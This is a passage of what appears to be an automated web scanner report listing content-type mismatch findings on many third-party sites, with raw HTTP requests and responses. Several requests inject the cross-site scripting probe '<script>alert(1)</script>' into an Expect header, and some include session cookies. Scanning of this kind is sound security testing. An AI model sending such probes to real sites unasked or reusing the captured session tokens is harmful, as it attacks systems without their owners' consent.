Date: Mon, 02 May 2011 02:03:32 GMT
Server: Apache
Last-Modified: Wed, 02 Jun 2010 00:39:26 GMT
ETag: "30897ad-16cb-48801526c0b80"
Accept-Ranges: bytes
Content-Length: 5835
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:32 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...
35.35. http://www.greenhulk.net/forums/customavatars/avatar3537_6.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar3537_6.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar3537_6.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:34 GMT
Server: Apache
Last-Modified: Sun, 21 Nov 2010 17:56:46 GMT
ETag: "3088250-15a6-49593dceb9380"
Accept-Ranges: bytes
Content-Length: 5542
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:34 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...
35.36. http://www.greenhulk.net/forums/customavatars/avatar9792_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar9792_2.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar9792_2.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:32 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 01:44:22 GMT
ETag: "3089646-176b-4877569c0a980"
Accept-Ranges: bytes
Content-Length: 5995
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:32 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...
35.37. http://www.healthination.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.healthination.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthination.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:22 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Last-Modified: Thu, 29 Jul 2010 11:49:06 GMT
Content-Length: 3638
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:22 GMT
Accept-Ranges: bytes

..............h...&... ..............(....... ...........@...................................D...............j.......Q...........&...........Z...D......."...v.......O...9......$.....................
...[SNIP]...
35.38. http://www.highcharts.com/highslide/graphics/zoomout.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /highslide/graphics/zoomout.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:48:45 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 10 Nov 2009 17:35:34 GMT
ETag: "5844108-146-47807bcc56580"
Accept-Ranges: bytes
Content-Length: 326
Connection: close
Content-Type: text/plain

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$    ..$    ..7.............................
...[SNIP]...
35.39. http://www.hsj.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hsj.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsj.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.40. http://www.ibegin.com/weather/weather_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 773


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
35.41. http://www.inmates-searches.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.inmates-searches.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inmates-searches.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.42. http://www.insites.eu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insites.eu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.insites.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.43. http://www.keds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.keds.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.keds.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:30:02 GMT
ETag: "1536-49aec41199e80"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:38:12 GMT
Connection: close

............ .h...&... .... .........(....... ..... ...................................................................................................................................................
...[SNIP]...
35.44. http://www.laterooms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.laterooms.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laterooms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 02 May 2011 00:28:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.45. http://www.leagle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leagle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leagle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:53:28 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.
35.46. http://www.mecum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mecum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mecum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:04:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.47. http://www.myfavoritegames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.myfavoritegames.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfavoritegames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NID DSP CAO COR"
Date: Sun, 01 May 2011 23:31:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.48. http://www.newswiretoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newswiretoday.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cekfc38cl4o1p4aijb5c05v7u6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 31 Dec 2005 02:04:57 GMT
ETag: "41963a7-57e-4092e6061a440"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

..............h.......(....... ...........@.......................#j|..5>.5...`...y.......G.................)...........................................................................................
...[SNIP]...
35.49. http://www.nfcc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nfcc.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nfcc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:18:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.50. http://www.nylaarp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nylaarp.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nylaarp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:33:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.51. http://www.picindividuals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.picindividuals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.picindividuals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.52. http://www.recon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.recon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.recon.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
WS: 5
Date: Sun, 01 May 2011 23:33:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.53. http://www.redirectgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.redirectgame.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redirectgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.54. http://www.ronniesmailorder.com/fiche_select1.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronnies.com/micro.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:30:09 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10

<!--T:0-->
35.55. http://www.ronniesmailorder.com/testimonials_display.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ronniesmailorder.com
Path:   /testimonials_display.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /testimonials_display.asp HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; __utmz=228257950.1304319978.1.1.utmcsr=ronnies.com|utmccn=(referral)|utmcmd=referral|utmcct=/micro.htm; __utma=228257950.337968248.1304319978.1304319978.1304319978.1; __utmc=228257950; __utmb=228257950.1.10.1304319978

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:07:08 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10

<!--T:0-->
35.56. http://www.rustoleum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rustoleum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rustoleum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:30:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.57. http://www.seoq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916; CAKEPHP=qrepgjnj88vg0sk4ucubrlciu3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:58 GMT
Server: Apache
Last-Modified: Tue, 08 Jun 2010 00:21:00 GMT
ETag: "34a879e-3aee-48879c38c1300"
Accept-Ranges: bytes
Content-Length: 15086
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$..................e....p\..t_..va..va.$.v............E.......................................5...w..........................
...[SNIP]...
35.58. http://www.seoq.com/webstatshq/images/fav/a/l/b/505403_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/a/l/b/505403_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/a/l/b/505403_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:01 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 09:52:08 GMT
ETag: "3520c7e-47e-4944b3a468200"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ..........................................n.0.n.P?.. ?...?............................................n.`.n...n.@?...?..0?.. ......................................
...[SNIP]...
35.59. http://www.seoq.com/webstatshq/images/fav/c/h/e/159320_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/c/h/e/159320_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/c/h/e/159320_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:19:54 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 12:39:50 GMT
ETag: "35807a2-e36-4944d92047180"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@................................>>>.........```. .....NNN.............ooo.....+++.444.....................www.............GGG.hhh.ZZZ...
...[SNIP]...
35.60. http://www.seoq.com/webstatshq/images/fav/def3.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/def3.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/def3.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:39 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:37:34 GMT
ETag: "34f8671-47e-4944f37108780"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................................:...n...................n...T..........................
...[SNIP]...
35.61. http://www.seoq.com/webstatshq/images/fav/def5.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/def5.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/def5.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:24:36 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:37:53 GMT
ETag: "34f8673-47e-4944f38327240"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................................:...n...................n...T..........................
...[SNIP]...
35.62. http://www.seoq.com/webstatshq/images/fav/def6.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/def6.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/def6.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:20:20 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:37:53 GMT
ETag: "34f8674-47e-4944f38327240"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................................:...n...................n...T..........................
...[SNIP]...
35.63. http://www.seoq.com/webstatshq/images/fav/e/b/a/22_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/e/b/a/22_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/e/b/a/22_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
